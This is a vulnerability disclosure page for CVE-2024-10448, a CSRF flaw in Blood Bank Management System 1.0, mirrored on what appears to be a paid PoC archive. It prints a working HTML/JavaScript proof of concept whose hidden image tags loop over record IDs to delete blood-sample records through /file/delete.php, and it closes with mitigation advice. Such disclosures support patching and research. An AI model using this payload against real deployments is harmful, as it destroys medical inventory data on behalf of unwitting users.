Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-10448 PoC — code-projects Blood Bank Management System delete.php cross-site request forgery

Source
https://github.com/0xbeven/CVE-2024-10448
Associated Vulnerability
Title:code-projects Blood Bank Management System delete.php cross-site request forgery (CVE-2024-10448)
Description:A vulnerability, which was classified as problematic, has been found in code-projects Blood Bank Management System 1.0. Affected by this issue is some unknown functionality of the file /file/delete.php. The manipulation of the argument bid leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Other endpoints might be affected as well.
Description
Blood bank CSRF Attack POC
Readme

## **Affected Version:**
- **BloodBank Management System**: 1.0

## **Vulnerability Information:**
- **Vulnerability Type:** Cross Site Request Forgery (CSRF)
- **Severity:** HIGH
- **Status:** Unpatched

## **Vulnerable Endpoint:**
- **Path:** `/file/delete.php?bid=`

## **Vulnerability Description:**
A **Cross Site Request Forgery (CSRF)** vulnerability was discovered in the **blood request functionality** of the BloodBank Management System. This flaw occurs when sending a `delete` request to this path `/file/delete.php?bid=` allowing the `bid` parameter to select a record to delete on the application. The `bids` however are dynamic depending on adding the blood samples, so to make the request successfull i used a javascript generated image tag within a loop. 

Successful exploitation can lead to **unauthorized actions ie deletion of data** on behalf of the victim. Additionally, this could be exploited by visiting malicious websites with the payload.

---

## **Proof of Concept (PoC):**

Below is an example of a **CSRF POC Attack** that deletes the `available blood samples`  via the `bid` parameter, host the file on an attacker controlled domain in my case i was using `localhost`:

```html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF PoC</title>
</head>
<body>
    <h2>CSRF Proof of Concept for Deleting Blood Bank Records</h2>
    <script>
        // Define the target URL where the Blood Bank System is hosted
        const targetUrl = "http://localhost/bloodbank/file/delete.php";

        // Loop through possible bid values (0 to 20) can be increased to as much as possible :)
        for (let bid = 0; bid <= 20; bid++) {
            // Create an image element for each bid value to send the GET request
            let img = document.createElement("img");
            img.src = `${targetUrl}?bid=${bid}`;
            img.style.display = "none";  // Hide the image from view
            document.body.appendChild(img);
        }
    </script>
</body>
</html>

```

---


## Video POC

- ![video link ](./bloodbank-delete-csrf.mp4)

## **Impact:**
- **Data Manipulation:** Attackers could modify the content displayed to users.
- **Reputational Damage:** Users may lose trust in the system due to malicious behavior.

---

## **Mitigation Recommendations:**
1. **Use CSRF Token** Implement mechanism to deter cross domain access or put `csrf tokens` in your request and also avoid `GET` requests from making state changing actions

---
File Snapshot

 [4.0K]  /data/pocs/2aaee88d1db8c1aabbed9382cb0450c267426784
├── [5.3M]  bloodbank-delete-csrf.mp4
├── [ 734]  poc.html
└── [2.4K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →